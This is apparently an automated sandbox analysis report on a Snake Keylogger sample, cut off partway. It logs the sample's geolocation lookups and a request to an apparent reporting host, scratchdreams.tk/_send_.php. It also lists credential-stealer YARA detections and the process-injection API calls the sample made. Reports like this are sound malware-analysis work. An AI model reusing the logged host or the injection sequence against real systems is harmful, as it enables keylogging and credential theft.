                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-03-27 10:24:09 UTC | 86 | OUT | GET /xml/102.165.48.43 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-03-27 10:24:09 UTC | 689 | IN | HTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:09 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: MISS
                                                Last-Modified: Wed, 27 Mar 2024 10:24:09 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1XHWcLQkrTvcWmaUrH4eQmzLt3WAev4hfQqanXiUB0wP7NpnRAKKu47eLPsjiwjdYPCh5M5C3XReIz0ZwBSwC7oPYvJyQaWR3DjNID986qShMREUNSiayzPffj1pZqbYEi5G4smi"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 86aeab4c0c886908-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                2024-03-27 10:24:09 UTC | 366 | IN | Data Ascii: 167<Response><IP>102.165.48.43</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
                                                2024-03-27 10:24:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.7 | 49707 | 172.67.177.134 | 443 | 6880 | C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-03-27 10:24:10 UTC | 86 | OUT | GET /xml/102.165.48.43 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-03-27 10:24:10 UTC | 698 | IN | HTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:10 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 3
                                                Last-Modified: Wed, 27 Mar 2024 10:24:07 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sL9ZwyDsPVH5ZdbSihLAkl7EEKDykiQuEitSic%2BInZ0Y4P3e7EeMph8bQcFRYns2ed0zG7sqIIZmjpjodQtJ8uW7y1oiRJQVjOUzh3hfwW27vC1lN9sdUoWaXAOmqF1PX5byFIoH"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 86aeab52ff208203-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                2024-03-27 10:24:10 UTC | 366 | IN | Data Ascii: 167<Response><IP>102.165.48.43</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
                                                2024-03-27 10:24:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.2.7 | 49709 | 172.67.177.134 | 443 | 6880 | C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-03-27 10:24:11 UTC | 86 | OUT | GET /xml/102.165.48.43 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-03-27 10:24:11 UTC | 695 | IN | HTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:11 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: MISS
                                                Last-Modified: Wed, 27 Mar 2024 10:24:11 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J0Ywr4uOvWyzvO9aktVmUw%2FTFcNIcSjPE72G90Hb0nP2ba5KJa5P4CzbQQanyVkBQmdgRbihxwNYhjJZ6fBLm2atdRAHSkJew6E%2FCMelnKqiTJEa%2FD2vpdHq62HlpwfPfotCX0nZ"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 86aeab5819a2084d-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                2024-03-27 10:24:11 UTC | 366 | IN | Data Ascii: 167<Response><IP>102.165.48.43</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
                                                2024-03-27 10:24:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                6           192.168.2.7  49711        172.67.177.134  443               6880  C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                Timestamp                Bytes transferred  Direction  Data
                                                2024-03-27 10:24:12 UTC  86                 OUT        GET /xml/102.165.48.43 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-03-27 10:24:13 UTC  697                IN         HTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:12 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: MISS
                                                Last-Modified: Wed, 27 Mar 2024 10:24:12 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zvlXXu9omYrYBU0rgwbbHwk%2FRtd1daUngWs%2FjiPS7LND3w7F7e9n1BM9waTgWYoduYMLPcVppUaDLOHYw12%2B4z971NeGK8r6W4HhiEvtOXlHDMLV0xjfJJWMyY5A4mfI8gWcwjN%2F"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 86aeab5f2b323b78-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                2024-03-27 10:24:13 UTC  366                IN         Data Ascii: 167<Response><IP>102.165.48.43</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
                                                2024-03-27 10:24:13 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                7           192.168.2.7  49713        172.67.177.134  443               6880  C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                Timestamp                Bytes transferred  Direction  Data
                                                2024-03-27 10:24:13 UTC  86                 OUT        GET /xml/102.165.48.43 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-03-27 10:24:13 UTC  710                IN         HTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:13 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 7
                                                Last-Modified: Wed, 27 Mar 2024 10:24:06 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L4itUl8OG734m29nR3yiDy83fnhY3%2FKgR0kzohkEU9%2BA2CEmIjeGMjFQwxa5kqyaDi3qJte%2B1ov5QhC4R%2BERkkojRnn0A3vuToQggdfOfQnkvDf%2FDBs9cwqKSG9UcH%2FBNjB5VD%2Fb"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 86aeab662e782413-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                2024-03-27 10:24:13 UTC  366                IN         Data Ascii: 167<Response><IP>102.165.48.43</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
                                                2024-03-27 10:24:13 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                8           192.168.2.7  49714        104.21.27.85    443               6880  C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                Timestamp                Bytes transferred  Direction  Data
                                                2024-03-27 10:24:14 UTC  79                 OUT        GET /_send_.php?TS HTTP/1.1
                                                Host: scratchdreams.tk
                                                Connection: Keep-Alive
                                                2024-03-27 10:24:45 UTC  739                IN         HTTP/1.1 522
                                                Date: Wed, 27 Mar 2024 10:24:45 GMT
                                                Content-Type: text/plain; charset=UTF-8
                                                Content-Length: 15
                                                Connection: close
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YQfq3sw%2BJHrpevX3A479g1aYfAFj%2BEQqu8UkIagv5gUEghg2QCyKfqPl47y40DEw1q8ry0e5mY2u%2FC8tkzQNU8hkfh%2FzzT4UC8syZ8iGaAly53FHTHR40JIeIRHA%2FiHXzhR5"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: same-origin
                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                Server: cloudflare
                                                CF-RAY: 86aeab6b2fa73b89-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                2024-03-27 10:24:45 UTC  15                 IN         Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                Data Ascii: error code: 522



                                                Target ID:1
                                                Start time:11:24:00
                                                Start date:27/03/2024
                                                Path:C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\PT98765445670009.scr.exe"
                                                Imagebase:0xab0000
                                                File size:638'464 bytes
                                                MD5 hash:90A34E7D570FA7C219EB5F1F193611BA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000001.00000002.1240469053.0000000005500000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                Reputation:low
                                                Has exited:true

                                                Target ID:2
                                                Start time:11:24:01
                                                Start date:27/03/2024
                                                Path:C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\PT98765445670009.scr.exe"
                                                Imagebase:0x990000
                                                File size:638'464 bytes
                                                MD5 hash:90A34E7D570FA7C219EB5F1F193611BA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.3688666945.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false


                                                  Execution Graph

                                                  Execution Coverage:5.9%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:76%
                                                  Total number of Nodes:25
                                                  Total number of Limit Nodes:1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239754563.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2d40000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (
                                                  • API String ID: 0-3887548279
                                                  • Opcode ID: 71ee7f545c7406b93193e9ed32c290d1751eed36578f84a81d2bea18b9f99e76
                                                  • Instruction ID: 0d6662f68e12d227a81fccb07a10be667f6993790fc1caf283e0b54f4c0260d2
                                                  • Opcode Fuzzy Hash: 71ee7f545c7406b93193e9ed32c290d1751eed36578f84a81d2bea18b9f99e76
                                                  • Instruction Fuzzy Hash: E252B074D012288FDB64DF65C994BEDBBB2BF89304F1081EAD409AB295DB349E85CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02D4B919
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239754563.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2d40000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 23a79a1671b4c668726c50b812c0fea1336e7d85c89064ffa94cf468946879a6
                                                  • Instruction ID: b56b2bf80196afd020765c6bd81fa516c1c8ffcfd7c151cc92d13b65441dabce
                                                  • Opcode Fuzzy Hash: 23a79a1671b4c668726c50b812c0fea1336e7d85c89064ffa94cf468946879a6
                                                  • Instruction Fuzzy Hash: D681CD75C00229DFDB24CFA5C884BEDBBF5BB59304F1091AAE509B7260DB349A89CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02D4A8C3
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239754563.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2d40000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: d42205c2666afb84f8eeef0c810a2cda86a56bac082c041af2ba488078666822
                                                  • Instruction ID: 9e88b3668da972740da7075d19f5566826521db2a237f08d6ed40e1a8ca021c4
                                                  • Opcode Fuzzy Hash: d42205c2666afb84f8eeef0c810a2cda86a56bac082c041af2ba488078666822
                                                  • Instruction Fuzzy Hash: 7E4199B4D012589FCF10CFA9D984AEEFBF1BB49310F14942AE818B7250D739AA45CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02D4BC25
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239754563.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2d40000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 6b6dc7a7c08d9d6074dd6016cd1dd231b4841abfeb8a07c9ba712ee254d05654
                                                  • Instruction ID: a7690961a98245c12f63c1523461b5557d97b3d0e3f2e3cbb3b3f97813cf548d
                                                  • Opcode Fuzzy Hash: 6b6dc7a7c08d9d6074dd6016cd1dd231b4841abfeb8a07c9ba712ee254d05654
                                                  • Instruction Fuzzy Hash: 854166B9D042589FCF10CFAAD984A9EFBB1BB19314F14A02AE814B7310D735AA45CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02D4A9F2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239754563.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2d40000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 72682b5c8d42103aa65b789c4f454766f446ea297d5b33f46260e84dcec06fc6
                                                  • Instruction ID: 3b94e268a0106d1b2cea8e99addc19a097aae390924f6616e3b5f622611ddeb5
                                                  • Opcode Fuzzy Hash: 72682b5c8d42103aa65b789c4f454766f446ea297d5b33f46260e84dcec06fc6
                                                  • Instruction Fuzzy Hash: 803198B8D042589FCF10CFA9D981ADEFBB1BB49310F10942AE815B7310DB35A946CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 02D4A777
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239754563.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2d40000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 9d8635583134457e1fd3257f510c3dd5509e08d5096dd11a42437702bc55f174
                                                  • Instruction ID: 974d6eea37b6407e101aac5292240c83a0091a308157f1508f8c1c047d7310c4
                                                  • Opcode Fuzzy Hash: 9d8635583134457e1fd3257f510c3dd5509e08d5096dd11a42437702bc55f174
                                                  • Instruction Fuzzy Hash: E831BBB4D012589FDB10DFAAD984AEEFBF1BB49310F24802AE418B7340DB39A945CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  APIs
                                                  • Wow64GetThreadContext.KERNEL32(?,?), ref: 02D4BB12
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239754563.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2d40000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: c61e81bf2d0be6db93ba9124a0a923ed398603b2e4a5b3821216ba56ef283ef2
                                                  • Instruction ID: b3aeb08624e6ca5c6e8de6649dcdd7026b95dfba4489b0bc3d65cc66698036aa
                                                  • Opcode Fuzzy Hash: c61e81bf2d0be6db93ba9124a0a923ed398603b2e4a5b3821216ba56ef283ef2
                                                  • Instruction Fuzzy Hash: AC31A9B4D012589FCB14CFAAD984ADEFBF1BB09314F24802AE418B7310D778A945CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  APIs
                                                  • ResumeThread.KERNELBASE(?), ref: 02D4AAE6
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239754563.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2d40000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 6d47210b202a1b60b05d2f6bee76485d8997fb72264aba7367b795d85f36deb1
                                                  • Instruction ID: 97cd3e23e3f934f4170eb79dc417cc4f1cac1f10eb0c14f2f64a521331a483b0
                                                  • Opcode Fuzzy Hash: 6d47210b202a1b60b05d2f6bee76485d8997fb72264aba7367b795d85f36deb1
                                                  • Instruction Fuzzy Hash: A831AAB4D013189FCB14CFAAD985A9EFBB5BB49310F14942AE815B7340DB35A941CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239516907.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_120d000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 745b5f58cecfbb9178fe72589d8fad8c8bb2baf80dc45e7c301a82497faed5d3
                                                  • Instruction ID: 3f6382f0a021dcc77bec5efed16a29b6984779bd4ae4931c8434e89dcf9d7e40
                                                  • Opcode Fuzzy Hash: 745b5f58cecfbb9178fe72589d8fad8c8bb2baf80dc45e7c301a82497faed5d3
                                                  • Instruction Fuzzy Hash: B2212571515208DFDB16DFD4E9C4B16BF65FB84324F20866DE9090B28BC336D456CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1239516907.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_120d000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                  • Instruction ID: 85c2da0d78b3234fdd9ff0a2e4fbac3f23c2a391a0f1a3038320562e8a1a2bf1
                                                  • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                  • Instruction Fuzzy Hash: E411B176504244CFCB16CF94D9C4B16BF72FB84324F2486A9D9090B697C336D456CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:15.5%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:29%
                                                  Total number of Nodes:62
                                                  Total number of Limit Nodes:7

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3689982941.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_52c0000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1c7eb1611d109bccf473a8a2e7b98f5299841a19c1cbc875ca04b306164e995c
                                                  • Instruction ID: 6ead98727c01085bc3896e7dda510215f3be69518078521ffda94eee8604509b
                                                  • Opcode Fuzzy Hash: 1c7eb1611d109bccf473a8a2e7b98f5299841a19c1cbc875ca04b306164e995c
                                                  • Instruction Fuzzy Hash: 15220774E102198FDB14DFA8C884B9DBBB2FF88300F1486A9D449AB395DB759D86CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3687789368.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2c30000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: s
                                                  • API String ID: 0-453955339
                                                  • Opcode ID: 829e772b0cb6559912cc17ed7195ebeb928247083c0ca61496193a94093b0b3c
                                                  • Instruction ID: d839858703eb1ed322b6d25bf6391ecb3cc1f03572a748233372b3ab9670fc7d
                                                  • Opcode Fuzzy Hash: 829e772b0cb6559912cc17ed7195ebeb928247083c0ca61496193a94093b0b3c
                                                  • Instruction Fuzzy Hash: 9EF15B71E00218CFDB15DFA9C584A9DBBB1FF89314F1584A9E819AB362DB30AD42CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3687789368.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2c30000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eebd797fd0dc9ca65c002b6f678acd4c548b7d954f1c016e1aacd3aead6b8290
                                                  • Instruction ID: da39fd3a6a5a1d2cf3d3a516d538a5060bbb8a8f6f191501c23ae86e158af9d4
                                                  • Opcode Fuzzy Hash: eebd797fd0dc9ca65c002b6f678acd4c548b7d954f1c016e1aacd3aead6b8290
                                                  • Instruction Fuzzy Hash: D9729031A00209DFCB16CF68D984AAEBBF2FF89300F158959E8499B3A5D771ED51CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3690568724.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_69d0000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7403d11b77f0e41a952dadd26140915c61513f3aa66b39dbf5b75aad183b1d72
                                                  • Instruction ID: a72af756c4a544493b0374479ad331d89a6e814222b6100331c8adbf4bdfa5e9
                                                  • Opcode Fuzzy Hash: 7403d11b77f0e41a952dadd26140915c61513f3aa66b39dbf5b75aad183b1d72
                                                  • Instruction Fuzzy Hash: 08825E74E012288FDBA5DF69C998BDDBBB2BB49301F1081EA940DA7364DB315E81DF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3687789368.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2c30000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ea454450ac447b099bb37b4949e929f45c098046257ebb0788ae1d3a99ab673a
                                                  • Instruction ID: f442b70e025190f49724e83653eb7ab8e4cf5dc4c0d029cdd9ecde4dbcbd1000
                                                  • Opcode Fuzzy Hash: ea454450ac447b099bb37b4949e929f45c098046257ebb0788ae1d3a99ab673a
                                                  • Instruction Fuzzy Hash: C772AE74E002288FDB65DF69C984BE9BBB2BF89300F1489E9D449A7355DB309E81CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3687789368.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2c30000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d7dcfcee7f8ed67b7e9c0f86bb156b9de58adea7d83a3538e8f074b981d4e862
                                                  • Instruction ID: 695d50f4975a988a0171d1eb683670def54189640ea807b3a105bf8807a8ea98
                                                  • Opcode Fuzzy Hash: d7dcfcee7f8ed67b7e9c0f86bb156b9de58adea7d83a3538e8f074b981d4e862
                                                  • Instruction Fuzzy Hash: FE127C71A002199FDB15DF69C854BAEBBF6BF88300F20892DE506DB395DB349D42CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
